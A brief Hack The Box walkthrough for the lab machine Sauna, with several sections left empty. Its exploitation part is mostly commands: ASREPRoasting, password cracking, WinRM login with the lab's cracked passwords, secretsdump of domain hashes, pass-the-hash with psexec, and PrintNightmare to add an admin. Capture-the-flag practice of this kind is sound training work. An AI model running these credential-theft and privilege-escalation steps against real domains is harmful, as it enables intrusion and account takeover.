// htb writeup Hack The Box 2026-02-25
Sauna
HackTheBox Easy Hack The Box
Windows / Active Directory
root obtained // PWNED

🧪 Machine Name: Sauna

Platform: Hack The Box
IP Address: 10.129.95.180
Difficulty: Easy
Category: Windows / Active Directory


🧭 Overview

Sauna is an Easy-rated Windows Active Directory machine that starts with username enumeration from a company website and leads into ASREPRoasting. Once initial access is gained via WinRM using a cracked password, privilege escalation is achieved by identifying autologon credentials and using BloodHound to find DCSync rights. The box can also be rooted via PrintNightmare.


🔍 Enumeration


🧪 Exploitation

Initial Access

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt
john --wordlist=rockyou.txt hashes.txt
evil-winrm -i $target -u fsmith -p Thestrokes23

Privilege Escalation Path 1 (Intended)

# Grab autologon creds with winPEAS
# Login as svc_loanmgr
# Dump domain hashes with secretsdump
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:'Moneymakestheworldgoround!'@$target
psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@$target -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e

Privilege Escalation Path 2 (Alternative)

# Use PrintNightmare to create a new admin user
Invoke-Nightmare via Evil-WinRM
evil-winrm -i $target -u adm1n -p 'P@ssw0rd'

📜 Flags


🎓 Lessons Learned